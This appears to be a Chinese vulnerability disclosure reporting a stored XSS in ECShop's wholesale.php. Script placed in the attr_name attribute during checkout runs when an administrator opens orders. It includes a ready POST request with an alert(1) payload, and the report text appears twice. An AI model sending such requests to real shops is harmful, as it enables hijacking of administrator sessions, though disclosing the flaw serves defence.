### 简要描述: 可打后台常用位置,算是必中XSS~~(PS:写漏洞标题时文本框自动补全“ecshop最新版本存储XSS至后台”,于是随手加了个2) ### 详细说明: 在批发页面,/wholesale.php,提交订单时商品属性attr_name插入xss代码,后台查看订单(对于一个商城来说,订单管理最常用了吧?所以能XSS就能中)执行xss代码。 注:此处之前提交过 [WooYun: ecshop最新版本前台二次注入系列(2)](http://www.wooyun.org/bugs/wooyun-2013-026458) ,下了最新版的看到二次注入已修复,随即想到XSS一下会怎么样了呐? 测试代码: http://localhost/test/ecshop/wholesale.php?act=add_to_cart POST: act_id=1&goods_number[1][0]=100&attr_id[1][0][0][attr_id]=120&attr_id[1][0][0][attr_val_id]=0&attr_id[1][0][0][attr_name]=a%27%3Cscript%3Ealert%281%29%3C%2Fscript%3E ### 漏洞证明: [<img src="https://images.seebug.org/upload/201307/040044568b3cbbe0ef082ef2e04b12a7cb791584.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/040044568b3cbbe0ef082ef2e04b12a7cb791584.png) [<img src="https://images.seebug.org/upload/201307/04004519d8c23f382bff115d00c10f5be9b1f109.png" alt="2.png" width="600"...
### 简要描述: 可打后台常用位置,算是必中XSS~~(PS:写漏洞标题时文本框自动补全“ecshop最新版本存储XSS至后台”,于是随手加了个2) ### 详细说明: 在批发页面,/wholesale.php,提交订单时商品属性attr_name插入xss代码,后台查看订单(对于一个商城来说,订单管理最常用了吧?所以能XSS就能中)执行xss代码。 注:此处之前提交过 [WooYun: ecshop最新版本前台二次注入系列(2)](http://www.wooyun.org/bugs/wooyun-2013-026458) ,下了最新版的看到二次注入已修复,随即想到XSS一下会怎么样了呐? 测试代码: http://localhost/test/ecshop/wholesale.php?act=add_to_cart POST: act_id=1&goods_number[1][0]=100&attr_id[1][0][0][attr_id]=120&attr_id[1][0][0][attr_val_id]=0&attr_id[1][0][0][attr_name]=a%27%3Cscript%3Ealert%281%29%3C%2Fscript%3E ### 漏洞证明: [<img src="https://images.seebug.org/upload/201307/040044568b3cbbe0ef082ef2e04b12a7cb791584.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/040044568b3cbbe0ef082ef2e04b12a7cb791584.png) [<img src="https://images.seebug.org/upload/201307/04004519d8c23f382bff115d00c10f5be9b1f109.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/04004519d8c23f382bff115d00c10f5be9b1f109.png)